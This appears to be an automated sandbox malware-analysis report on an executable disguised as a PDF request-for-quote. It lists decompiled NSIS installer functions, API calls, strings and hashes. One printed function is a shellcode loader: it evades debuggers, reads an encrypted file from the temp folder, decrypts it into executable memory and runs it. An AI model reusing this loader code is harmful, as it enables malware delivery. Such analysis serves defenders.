                                                                        											}
                                                                        											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
                                                                        												E00405707(0x79d941, 0);
                                                                        												if("C:\\Users\\jones\\AppData\\Local\\Temp" == 0) {
                                                                        													E00405513(0x79e140);
                                                                        												} else {
                                                                        													E004059BF(0x79e140, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                                                        												}
                                                                        												lstrcatA(0x79d940, "\" ");
                                                                        												lstrcatA(0x79d940, _v400);
                                                                        												lstrcatA(0x79d940, " _?=");
                                                                        												lstrcatA(0x79d940, 0x79e140);
                                                                        												E004054CC(0x79d940);
                                                                        												_t78 = E00405247(0x79d940, _t89);
                                                                        												if(_t78 != 0) {
                                                                        													CloseHandle(_t78);
                                                                        													_t105 = 0;
                                                                        												}
                                                                        											}
                                                                        											L43:
                                                                        											"Au_.exe" =  &("Au_.exe"[1]);
                                                                        											_v404 = _v404 + 1;
                                                                        										} while (_v404 < 0x1a);
                                                                        										goto L32;
                                                                        									}
                                                                        									 *_t103 =  *_t103 & 0x00000000;
                                                                        									_t104 =  &(_t103[4]);
                                                                        									if(E004055AC(_t116,  &(_t103[4])) == 0) {
                                                                        										goto L32;
                                                                        									}
                                                                        									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                                                        									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
                                                                        									_t105 = 0;
                                                                        									goto L31;
                                                                        								}
                                                                        								goto L17;
                                                                        							}
                                                                        						} else {
                                                                        							goto L6;
                                                                        						}
                                                                        						do {
                                                                        							L6:
                                                                        							_t43 = _t43 + 1;
                                                                        							__eflags =  *_t43 - 0x20;
                                                                        						} while ( *_t43 == 0x20);
                                                                        						goto L7;
                                                                        					}
                                                                        					goto L22;
                                                                        				}
                                                                        				GetWindowsDirectoryA(_t89, 0x3fb);
                                                                        				lstrcatA(_t89, "\\Temp");
                                                                        				if(E00403116(_t109) == 0) {
                                                                        					goto L32;
                                                                        				}
                                                                        				goto L2;
                                                                        			}
                                                                        Instruction addresses (decompiler address column for the C-code above, one entry per code line; column alignment lost in extraction):
                                                                        0x00403153 0x00403156 0x0040315a 0x0040315f 0x00403164 0x0040316b 0x00403171 0x00403187 0x00403197 0x0040319c
                                                                        0x004031a7 0x004031ad 0x004031b2 0x004031b4 0x004031da 0x004031da 0x004031e0 0x004031ee 0x00403202 0x00403207
                                                                        0x00403209 0x0040320b 0x00403210 0x00403210 0x00403220 0x00403226 0x0040328f 0x0040328f 0x00403291 0x00403293
                                                                        0x00000000 0x00000000 0x0040322c 0x0040322f 0x00403237 0x00403237 0x0040323a 0x0040323f 0x00403241 0x00403241
                                                                        0x00403242 0x00403242 0x00403247 0x0040324a 0x0040327f 0x00403284 0x00403289 0x0040328c 0x0040328e 0x0040328e
                                                                        0x0040328e 0x00000000 0x0040324c 0x0040324c 0x0040324d 0x00403250 0x00403258 0x0040325b 0x0040325d 0x0040325d
                                                                        0x0040325d 0x0040325b 0x00403260 0x00403266 0x0040326e 0x00403271 0x00403273 0x00403273 0x00403273 0x00403271
                                                                        0x00403276 0x0040327d 0x00403297 0x0040329b 0x004032a4 0x004032a9 0x004032aa 0x004032af 0x004032b3 0x00403316
                                                                        0x00403316 0x0040331b 0x00403323 0x0040344e 0x00403455 0x00403471 0x0040347e 0x00403487 0x00403489 0x0040348b
                                                                        0x0040348d 0x0040348f 0x00403491 0x00403493 0x004034a3 0x004034a5 0x004034a7 0x004034b4 0x004034c3 0x004034cb
                                                                        0x004034d3 0x004034d3 0x004034a7 0x00403493 0x0040348f 0x004034d8 0x004034de 0x004034e0 0x004034e4 0x004034e4
                                                                        0x004034e0 0x004034e9 0x004034ee 0x004034f1 0x004034f3 0x004034f3 0x004034fb 0x004034fb 0x0040332f 0x00403336
                                                                        0x00403336 0x004032bb 0x00403306 0x00403306 0x00403312 0x00000000 0x00403312 0x004032c4 0x004032d1 0x004032c8
                                                                        0x004032ce 0x00000000 0x00000000 0x004032d0 0x004032d0 0x004032d0 0x004032d5 0x004032d7 0x004032dc 0x00403342
                                                                        0x0040334a 0x00403350 0x0040335f 0x00403361 0x0040336a 0x00403375 0x0040337f 0x00403387 0x00000000 0x00000000
                                                                        0x004033b3 0x00000000 0x00000000 0x004033c9 0x004033d2 0x004033de 0x004033ee 0x004033e0 0x004033e6 0x004033e6
                                                                        0x004033f9 0x00403403 0x0040340e 0x00403415 0x0040341b 0x00403422 0x00403429 0x0040342c 0x00403432 0x00403432
                                                                        0x00403429 0x00403434 0x00403434 0x0040343a 0x0040343e 0x00000000 0x00403449 0x004032de 0x004032e1 0x004032ec
                                                                        0x00000000 0x00000000 0x004032f4 0x004032ff 0x00403304 0x00000000 0x00403304 0x00000000 0x0040327d 0x00000000
                                                                        0x00000000 0x00000000 0x00403231 0x00403231 0x00403231 0x00403232 0x00403232 0x00000000 0x00403231 0x00000000
                                                                        0x00403295 0x004031bc 0x004031c8 0x004031d4 0x00000000 0x00000000 0x00000000

                                                                        APIs
                                                                        • #17.COMCTL32 ref: 00403164
                                                                        • OleInitialize.OLE32(00000000), ref: 0040316B
                                                                        • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
                                                                          • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
                                                                          • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                        • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ), ref: 004031E0
                                                                        • GetCommandLineA.KERNEL32 ref: 004031E6
                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 004031F5
                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000020), ref: 00403220
                                                                        • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
                                                                        • ExitProcess.KERNEL32 ref: 00403336
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
                                                                        • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
                                                                        • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
                                                                        • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
                                                                        • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
                                                                        • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
                                                                        • CopyFileA.KERNEL32 ref: 004033C1
                                                                        • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
                                                                        • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
                                                                        • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
                                                                        • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
                                                                        • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
                                                                        • ExitProcess.KERNEL32 ref: 004034FB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                                                        • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                                                        • API String ID: 3079827372-2867230742
                                                                        • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                        • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
                                                                        • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                        • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			/* Recursive delete routine from the NSIS installer stub (decompiler output).
                                                                        			 * _a4 is the path to delete; _a8 is a flag bitmask as used by the code below:
                                                                        			 *   bit 3 (0x8): plain DeleteFileA of _a4, error counter at 0x7a3008 bumped on failure
                                                                        			 *   bit 0 (0x1): treat _a4 as a directory and enumerate "\*.*" beneath it
                                                                        			 *   bit 1 (0x2): together with bit 0, recurse into subdirectories
                                                                        			 *   bit 2 (0x4): on a failed delete, hand the path to E00405707 instead of counting an error
                                                                        			 * E004059BF copies a string, E00404D62 logs a status message, E00405C94 tests the directory. */
                                                                        			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				struct _WIN32_FIND_DATAA _v332;
                                                                        				CHAR* _t31; /* declaration missing in the decompiler output; used to strip the trailing separator */
                                                                        				signed int _t37;
                                                                        				char* _t49;
                                                                        				signed char _t51;
                                                                        				signed int _t54;
                                                                        				signed int _t57;
                                                                        				signed int _t63;
                                                                        				signed int _t65;
                                                                        				void* _t67;
                                                                        				signed int _t70;
                                                                        				CHAR* _t72;
                                                                        				CHAR* _t74;
                                                                        				char* _t77;
                                                                        
                                                                        				_t74 = _a4;
                                                                        				_t37 = E004055AC(__eflags, _t74);
                                                                        				_v12 = _t37;
                                                                        				if((_a8 & 0x00000008) != 0) {
                                                                        					_t65 = DeleteFileA(_t74); // executed
                                                                        					asm("sbb eax, eax");
                                                                        					_t67 =  ~_t65 + 1;
                                                                        					 *0x7a3008 =  *0x7a3008 + _t67;
                                                                        					return _t67;
                                                                        				}
                                                                        				_t70 = _a8 & 0x00000001;
                                                                        				__eflags = _t70;
                                                                        				_v8 = _t70;
                                                                        				if(_t70 == 0) {
                                                                        					L5:
                                                                        					E004059BF(0x7a0588, _t74);
                                                                        					__eflags = _t70;
                                                                        					if(_t70 == 0) {
                                                                        						E00405513(_t74);
                                                                        					} else {
                                                                        						lstrcatA(0x7a0588, "\\*.*");
                                                                        					}
                                                                        					lstrcatA(_t74, 0x409010);
                                                                        					_t72 =  &(_t74[lstrlenA(_t74)]);
                                                                        					_t37 = FindFirstFileA(0x7a0588,  &_v332);
                                                                        					__eflags = _t37 - 0xffffffff;
                                                                        					_a4 = _t37;
                                                                        					if(_t37 == 0xffffffff) {
                                                                        						L26:
                                                                        						__eflags = _v8;
                                                                        						if(_v8 != 0) {
                                                                        							_t31 = _t72 - 1;
                                                                        							 *_t31 =  *(_t72 - 1) & 0x00000000;
                                                                        							__eflags =  *_t31;
                                                                        						}
                                                                        						goto L28;
                                                                        					} else {
                                                                        						goto L9;
                                                                        					}
                                                                        					do {
                                                                        						L9:
                                                                        						_t77 =  &(_v332.cFileName);
                                                                        						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
                                                                        						__eflags =  *_t49;
                                                                        						if( *_t49 != 0) {
                                                                        							__eflags = _v332.cAlternateFileName;
                                                                        							if(_v332.cAlternateFileName != 0) {
                                                                        								_t77 =  &(_v332.cAlternateFileName);
                                                                        							}
                                                                        						}
                                                                        						__eflags =  *_t77 - 0x2e;
                                                                        						if( *_t77 != 0x2e) {
                                                                        							L16:
                                                                        							E004059BF(_t72, _t77);
                                                                        							_t51 = _v332.dwFileAttributes;
                                                                        							__eflags = _t51 & 0x00000010;
                                                                        							if((_t51 & 0x00000010) == 0) {
                                                                        								SetFileAttributesA(_t74, _t51 & 0x000000fe);
                                                                        								_t54 = DeleteFileA(_t74);
                                                                        								__eflags = _t54;
                                                                        								if(_t54 != 0) {
                                                                        									E00404D62(0xfffffff2, _t74);
                                                                        								} else {
                                                                        									__eflags = _a8 & 0x00000004;
                                                                        									if((_a8 & 0x00000004) == 0) {
                                                                        										 *0x7a3008 =  *0x7a3008 + 1;
                                                                        									} else {
                                                                        										E00404D62(0xfffffff1, _t74);
                                                                        										E00405707(_t74, 0);
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								__eflags = (_a8 & 0x00000003) - 3;
                                                                        								if(__eflags == 0) {
                                                                        									E00405301(_t72, __eflags, _t74, _a8);
                                                                        								}
                                                                        							}
                                                                        							goto L24;
                                                                        						}
                                                                        						_t63 =  *((intOrPtr*)(_t77 + 1));
                                                                        						__eflags = _t63;
                                                                        						if(_t63 == 0) {
                                                                        							goto L24;
                                                                        						}
                                                                        						__eflags = _t63 - 0x2e;
                                                                        						if(_t63 != 0x2e) {
                                                                        							goto L16;
                                                                        						}
                                                                        						__eflags =  *((char*)(_t77 + 2));
                                                                        						if( *((char*)(_t77 + 2)) == 0) {
                                                                        							goto L24;
                                                                        						}
                                                                        						goto L16;
                                                                        						L24:
                                                                        						_t57 = FindNextFileA(_a4,  &_v332);
                                                                        						__eflags = _t57;
                                                                        					} while (_t57 != 0);
                                                                        					_t37 = FindClose(_a4);
                                                                        					goto L26;
                                                                        				} else {
                                                                        					__eflags = _t37;
                                                                        					if(_t37 == 0) {
                                                                        						L28:
                                                                        						__eflags = _v8;
                                                                        						if(_v8 == 0) {
                                                                        							L36:
                                                                        							return _t37;
                                                                        						}
                                                                        						__eflags = _v12;
                                                                        						if(_v12 != 0) {
                                                                        							_t37 = E00405C94(_t74);
                                                                        							__eflags = _t37;
                                                                        							if(_t37 == 0) {
                                                                        								goto L36;
                                                                        							}
                                                                        							E004054CC(_t74);
                                                                        							SetFileAttributesA(_t74, 0x80);
                                                                        							_t37 = RemoveDirectoryA(_t74);
                                                                        							__eflags = _t37;
                                                                        							if(_t37 != 0) {
                                                                        								return E00404D62(0xffffffe5, _t74);
                                                                        							}
                                                                        							__eflags = _a8 & 0x00000004;
                                                                        							if((_a8 & 0x00000004) == 0) {
                                                                        								goto L30;
                                                                        							}
                                                                        							E00404D62(0xfffffff1, _t74);
                                                                        							return E00405707(_t74, 0);
                                                                        						}
                                                                        						L30:
                                                                        						 *0x7a3008 =  *0x7a3008 + 1;
                                                                        						return _t37;
                                                                        					}
                                                                        					__eflags = _a8 & 0x00000002;
                                                                        					if((_a8 & 0x00000002) == 0) {
                                                                        						goto L28;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 0040531F
                                                                        • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 00405369
                                                                        • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 0040537C
                                                                        • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 00405382
                                                                        • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 00405393
                                                                        • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
                                                                        • FindClose.KERNEL32(?), ref: 0040545B
                                                                        Strings
                                                                        • \*.*, xrefs: 00405363
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
                                                                        • "C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" , xrefs: 0040530B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                        • API String ID: 2035342205-3349225713
                                                                        • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                        • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
                                                                        • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                        • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E72AD1000() {
                                                                        				long _v8;
                                                                        				short _v528;
                                                                        				long _t12;
                                                                        				void* _t16;
                                                                        				signed char _t22;
                                                                        				void* _t39;
                                                                        				long _t42;
                                                                        
                                                                        				_v8 = 0;
                                                                        				if(IsDebuggerPresent() != 0) {
                                                                        					DebugBreak();
                                                                        				}
                                                                        				_t12 = GetTempPathW(0x103,  &_v528);
                                                                        				if(_t12 != 0) {
                                                                        					lstrcatW( &_v528, L"\\dax13un2d6");
                                                                        					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                        					_t39 = _t16;
                                                                        					if(_t39 == 0xffffffff) {
                                                                        						L12:
                                                                        						return _t16;
                                                                        					}
                                                                        					_t16 = GetFileSize(_t39, 0);
                                                                        					_t42 = _t16;
                                                                        					if(_t42 == 0xffffffff) {
                                                                        						L11:
                                                                        						goto L12;
                                                                        					}
                                                                        					_t16 = VirtualAlloc(0, _t42, 0x3000, 0x40); // executed
                                                                        					 *0x72ad3000 = _t16;
                                                                        					if(_t16 == 0) {
                                                                        						goto L11;
                                                                        					}
                                                                        					_t16 = ReadFile(_t39, _t16, _t42,  &_v8, 0); // executed
                                                                        					if(_t16 == 0) {
                                                                        						goto L11;
                                                                        					}
                                                                        					_t22 = 0;
                                                                        					if(_v8 <= 0) {
                                                                        						L10:
                                                                        						_t16 =  *0x72ad3000(); // executed
                                                                        						goto L11;
                                                                        					}
                                                                        					do {
                                                                        						asm("ror cl, 0x3");
                                                                        						asm("ror cl, 0x2");
                                                                        						 *((char*)( *0x72ad3000 + _t22)) = (_t22 - ((((( *((intOrPtr*)( *0x72ad3000 + _t22)) + 0x00000029 ^ 0x00000051) - 0x0000006b ^ 0x0000002c) + _t22 ^ 0x000000e6) + 0x00000065 ^ 0x000000ea) - _t22 + _t22 ^ _t22) ^ 0x00000092) + 0x26;
                                                                        						_t22 = _t22 + 1;
                                                                        					} while (_t22 < _v8);
                                                                        					goto L10;
                                                                        				}
                                                                        				return _t12;
                                                                        			}


                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 72AD1010
                                                                        • DebugBreak.KERNEL32 ref: 72AD101A
                                                                        • GetTempPathW.KERNEL32(00000103,?), ref: 72AD102C
                                                                        • lstrcatW.KERNEL32(?,\dax13un2d6), ref: 72AD1047
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72AD1066
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 72AD107B
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 72AD1092
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 72AD10AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657581341.0000000072AD1000.00000020.00020000.sdmp, Offset: 72AD0000, based on PE: true
                                                                        • Associated: 00000000.00000002.657575415.0000000072AD0000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.657585797.0000000072AD2000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.657591786.0000000072AD4000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
                                                                        • String ID: \dax13un2d6
                                                                        • API String ID: 4020703165-2054650729
                                                                        • Opcode ID: dac1c0fc91f7b2cdbb2a8b3c5d87bddba4db80d6fd282744316daa6bbf083383
                                                                        • Instruction ID: 6b560c4c47377a376afa48876b926c25177e28d87b76e01f4e8bff80a978065b
                                                                        • Opcode Fuzzy Hash: dac1c0fc91f7b2cdbb2a8b3c5d87bddba4db80d6fd282744316daa6bbf083383
                                                                        • Instruction Fuzzy Hash: BA213772980210AFE7109B76CCAEBDB7BB8E705751F605259F612E20CEE634850BCA60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E00401FDC(int __ebx) {
                                                                        				struct HINSTANCE__* _t20;
                                                                        				struct HINSTANCE__* _t27;
                                                                        				int _t28;
                                                                        				struct HINSTANCE__* _t33;
                                                                        				CHAR* _t35;
                                                                        				intOrPtr* _t36;
                                                                        				void* _t37;
                                                                        
                                                                        				_t28 = __ebx;
                                                                        				 *(_t37 - 4) = 1;
                                                                        				SetErrorMode(0x8001); // executed
                                                                        				if( *0x7a3030 < __ebx) {
                                                                        					_push(0xffffffe7);
                                                                        					goto L14;
                                                                        				} else {
                                                                        					_t35 = E00402A9A(0xfffffff0);
                                                                        					 *(_t37 + 8) = E00402A9A(1);
                                                                        					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
                                                                        						L3:
                                                                        						_t20 = LoadLibraryA(_t35); // executed
                                                                        						_t33 = _t20;
                                                                        						if(_t33 == _t28) {
                                                                        							_push(0xfffffff6);
                                                                        							L14:
                                                                        							E00401428();
                                                                        						} else {
                                                                        							goto L4;
                                                                        						}
                                                                        					} else {
                                                                        						_t27 = GetModuleHandleA(_t35); // executed
                                                                        						_t33 = _t27;
                                                                        						if(_t33 != __ebx) {
                                                                        							L4:
                                                                        							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
                                                                        							if(_t36 == _t28) {
                                                                        								E00404D62(0xfffffff7,  *(_t37 + 8));
                                                                        							} else {
                                                                        								 *(_t37 - 4) = _t28;
                                                                        								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
                                                                        									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed
                                                                        								} else {
                                                                        									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
                                                                        									if( *_t36() != 0) {
                                                                        										 *(_t37 - 4) = 1;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
                                                                        								FreeLibrary(_t33);
                                                                        							}
                                                                        						} else {
                                                                        							goto L3;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				SetErrorMode(_t28);
                                                                        				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
                                                                        				return 0;
                                                                        			}


                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                        • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                                                        • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                                                        • SetErrorMode.KERNEL32 ref: 0040209B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 1609199483-0
                                                                        • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                        • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
